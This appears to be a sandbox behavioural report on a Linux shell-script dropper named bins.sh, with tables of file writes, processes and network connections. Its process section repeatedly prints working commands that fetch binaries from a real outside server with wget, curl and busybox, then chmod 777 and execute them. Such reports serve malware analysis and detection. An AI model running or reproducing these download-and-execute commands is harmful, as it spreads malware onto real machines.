| N/A | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | N/A |
| N/A | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | N/A |
| N/A | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | N/A |
| N/A | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | N/A |
| N/A | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | N/A |
| N/A | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | N/A |
| N/A | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | N/A |
| N/A | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | N/A |
| N/A | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | N/A |
| N/A | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | N/A |
| N/A | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | N/A |
| N/A | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | N/A |
| N/A | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | N/A |
| N/A | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | N/A |
| N/A | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | N/A |
| N/A | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | N/A |
| N/A | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | N/A |
| N/A | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc | /usr/bin/curl | N/A |
Processes
/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh
[/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/chmod
[chmod 777 YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN
[./YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/rm
[rm YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/usr/bin/wget
[wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/chmod
[chmod 777 Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e
[./Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/rm
[rm Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/usr/bin/wget
[wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/chmod
[chmod 777 pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc
[./pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/rm
[rm pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/usr/bin/wget
[wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/chmod
[chmod 777 FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ
[./FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/rm
[rm FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/chmod
[chmod 777 ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy
[./ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/rm
[rm ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/usr/bin/wget
[wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/chmod
[chmod 777 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc
[./1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/rm
[rm 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/usr/bin/wget
[wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/chmod
[chmod 777 VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx
[./VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/rm
[rm VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/usr/bin/wget
[wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/chmod
[chmod 777 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH
[./81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/rm
[rm 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/usr/bin/wget
[wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/chmod
[chmod 777 FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3
[./FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/rm
[rm FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/usr/bin/wget
[wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/chmod
[chmod 777 Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk
[./Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/rm
[rm Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/usr/bin/wget
[wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/chmod
[chmod 777 kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO
[./kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/rm
[rm kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/usr/bin/wget
[wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/chmod
[chmod 777 I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV
[./I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/rm
[rm I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/usr/bin/wget
[wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/chmod
[chmod 777 IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi
[./IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/rm
[rm IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/usr/bin/wget
[wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/chmod
[chmod 777 yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM
[./yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/rm
[rm yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/usr/bin/wget
[wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/chmod
[chmod 777 I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV
[./I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/bin/rm
[rm I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]
/usr/bin/wget
[wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/chmod
[chmod 777 IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi
[./IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/bin/rm
[rm IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]
/usr/bin/wget
[wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/chmod
[chmod 777 yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM
[./yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/bin/rm
[rm yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]
/usr/bin/wget
[wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/chmod
[chmod 777 kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO
[./kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/bin/rm
[rm kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]
/usr/bin/wget
[wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/chmod
[chmod 777 YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN
[./YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/bin/rm
[rm YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]
/usr/bin/wget
[wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/chmod
[chmod 777 Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e
[./Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/bin/rm
[rm Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]
/usr/bin/wget
[wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/chmod
[chmod 777 pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc
[./pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/bin/rm
[rm pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]
/usr/bin/wget
[wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/chmod
[chmod 777 FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ
[./FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/bin/rm
[rm FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/chmod
[chmod 777 ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy
[./ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/bin/rm
[rm ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]
/usr/bin/wget
[wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/chmod
[chmod 777 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH
[./81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/bin/rm
[rm 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]
/usr/bin/wget
[wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/chmod
[chmod 777 FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3
[./FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/bin/rm
[rm FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]
/usr/bin/wget
[wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/chmod
[chmod 777 Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk
[./Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/bin/rm
[rm Bm41gwbeemewl88MTcw92QLt84X6ged9hk]
/usr/bin/wget
[wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/chmod
[chmod 777 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc
[./1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/bin/rm
[rm 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]
/usr/bin/wget
[wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/chmod
[chmod 777 VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx
[./VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
/bin/rm
[rm VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
